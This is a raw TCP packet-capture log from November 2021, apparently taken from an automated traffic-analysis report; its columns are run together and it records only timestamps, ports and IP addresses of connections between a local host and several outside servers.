                                                                                                                                                                                Nov 11, 2021 12:26:27.117933035 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118030071 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118083000 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118099928 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118108034 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118155956 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118184090 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118204117 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118292093 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118344069 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118359089 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118367910 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118416071 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118438959 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118474960 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118563890 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118613005 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118633032 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118643045 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118666887 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118700027 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118742943 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118891001 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.118969917 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.118973017 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119013071 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119060040 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119096041 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119230986 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119287014 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119393110 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119462967 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119466066 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119483948 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119525909 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119545937 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119656086 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119712114 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119815111 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119864941 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119880915 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119891882 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.119925976 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119945049 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.119971991 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120021105 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120063066 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120115042 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120143890 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120152950 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120182037 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120203018 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120230913 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120321035 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120367050 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120420933 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120430946 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120459080 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120491982 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120500088 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120560884 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120580912 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120589018 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120626926 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120635033 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120676994 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120682001 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120711088 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120750904 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.120758057 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.120815992 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.256433010 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.256509066 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.256599903 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.256608009 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.256679058 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.256706953 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.256735086 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.256983042 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257036924 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257065058 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257088900 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257112980 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257365942 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257441998 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257450104 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257472992 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257493973 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257515907 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257546902 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257566929 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257673979 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257678986 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257695913 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257736921 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257765055 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257792950 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257874966 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.257925987 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.257986069 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258018970 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258073092 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258093119 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258120060 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258138895 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258147955 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258166075 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258313894 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258409023 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258469105 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258500099 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258527040 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258548021 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258557081 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258656025 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258790970 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258840084 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.258867025 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.258884907 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.259787083 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.259908915 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.259916067 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.259943008 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.259999990 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.260032892 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.260056019 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.261589050 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397439957 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397502899 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397581100 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397627115 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397646904 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397667885 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397679090 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397743940 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397747993 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397770882 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397852898 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397927999 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.397942066 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.397990942 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.398019075 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398057938 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398061037 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.398089886 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.398158073 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398178101 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398595095 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.398699999 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398736000 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.398798943 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.398945093 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.399043083 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.399095058 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.399173975 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.399403095 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.399471998 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.399681091 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.399785995 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.399827957 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.399916887 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.400033951 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.400105000 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.400293112 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.400367975 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.400388002 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.400449991 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.400500059 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.400770903 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.400934935 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401065111 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401150942 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401226997 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401262045 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401289940 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401360035 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401415110 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401463032 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401479959 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401513100 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401535988 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401561022 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401750088 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401812077 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401850939 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401869059 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.401885986 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401906967 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.401920080 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402204990 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402293921 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402316093 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402362108 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402398109 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402415991 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402467966 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402479887 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402501106 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402595997 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402645111 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402688980 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402708054 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402726889 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402801037 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402903080 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.402920008 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.402971029 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:27.403039932 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.414321899 CET49775443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:27.414370060 CET4434977552.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.725503922 CET4978280192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.747713089 CET804978288.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.747812986 CET4978280192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.765022039 CET4978280192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.786998987 CET804978288.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.787024975 CET804978288.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.787103891 CET4978280192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.807297945 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.807347059 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.807427883 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.807905912 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.807924032 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.893789053 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.893913984 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.900753975 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.900777102 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.901129961 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.901237011 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.902137995 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.932324886 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.932387114 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.932415009 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.932432890 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.934674025 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.934695005 CET4434978388.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.934705973 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:31.934746027 CET49783443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:26:36.023901939 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.023973942 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.024048090 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.113557100 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.113611937 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.438378096 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.438604116 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.439758062 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.439770937 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.443475008 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.443495989 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.620944977 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.621017933 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.621026039 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.621066093 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.621984005 CET49785443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:26:36.622006893 CET44349785104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.689837933 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:36.689889908 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:36.690591097 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:36.690639973 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:36.690650940 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.107748032 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.107825041 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.113076925 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.113095045 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.117361069 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.117379904 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.276411057 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.276531935 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:37.276546955 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.276582003 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.293994904 CET49786443192.168.2.552.216.1.8
                                                                                                                                                                                Nov 11, 2021 12:26:37.294024944 CET4434978652.216.1.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.663178921 CET4979080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.664592028 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.688412905 CET8049790178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.688525915 CET4979080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.689750910 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.689830065 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.709564924 CET4979080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.710017920 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.710181952 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.710369110 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.710459948 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.735233068 CET8049790178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735279083 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735311031 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735426903 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735464096 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735490084 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.735496998 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735524893 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.735534906 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735553980 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.735579967 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735613108 CET8049791178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.735625029 CET4979180192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:26:47.735647917 CET4979180192.168.2.5178.208.83.45
